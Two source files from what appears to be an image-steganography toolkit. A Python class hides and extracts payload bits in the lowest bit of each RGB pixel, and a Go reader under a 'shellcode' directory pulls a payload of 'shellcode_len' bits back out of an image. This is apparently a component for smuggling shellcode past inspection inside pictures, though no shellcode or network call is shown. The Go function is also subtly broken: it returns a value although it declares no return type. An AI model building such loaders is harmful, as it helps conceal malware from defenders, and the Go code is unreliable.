File: algorithms/LSB.py
from itertools import product

from bitarray import bitarray
from PIL import Image

from .IAlgorithm import IAlgorithm
from .utils import chunks


class LSB(IAlgorithm):
    def capacity(self, img: Image):
        """Maximum number of least significant bits"""
        return img.height * img.width * 3

    def embed(self, payload: bitarray, img: Image, *args, **kwargs):
        assert len(payload) <= self.capacity(img), \
            f'[-] payload length ({len(payload)}) is greater than image capacity ({self.capacity(img)})!'

        for (y, x), pixel_bits in zip(product(range(img.height), range(img.width)), chunks(payload, 3)):
            r, g, b = img.getpixel((x, y))

            """set lsb of each color to target value"""
            if payload: r = self.set_lsb(r, pixel_bits[0])
            if payload: g = self.set_lsb(g, pixel_bits[1])
            if payload: b = self.set_lsb(b, pixel_bits[2])

            img.putpixel((x, y), (r, g, b))

        return img

    def extract(self, img: Image, payload_bits: int, *args, **kwargs) -> bitarray:
        payload = bitarray()

        for y, x in product(range(img.height), range(img.width)):
            for byte in img.getpixel((x, y)):
                if not payload_bits:
                    break

                bit = self.get_lsb(byte)
                payload.append(bit)
                payload_bits -= 1
        return payload

    def pixels_for(self, n):
        return n / 3

    def set_lsb(self, byte, value):
        """
        set last bit to 1 by doing bitwise OR with 0b00000001
        set last bit to 0 by doing bitwise AND with 0b11111110
        """
        return byte | 0b1 if value else byte & ~0b1

    def get_lsb(self, byte):
        """get last bit by doing bitwise AND with 0b00000001"""
        return byte & 0b1

    def img_mode(self):
        return "RGB"

File: readers/go/shellcode/algorithms/lsb.go
// +build payload_algorithm_lsb

package main

import (
	"image"
)

func get_lsb(target byte, source byte) byte {
	return (target << 1) | (source & 1)
}

func get_payload(img image.Image, payload_data []byte) {
	g := img.Bounds()

	height := g.Dy()
	width := g.Dx()

	length := shellcode_len
	pos := 0

	for i := 0; i < height; i++ {
		for j := 0; j < width; j++ {

			r, g, b, _ := img.At(j, i).RGBA()

			for _, channel := range [3]byte{byte(r), byte(g), byte(b)} {
				if length <= 0 {
					return payload_data
				}

				payload_data[pos/8] = get_lsb(payload_data[pos/8], channel)
				pos++
				length--
			}
		}
	}
}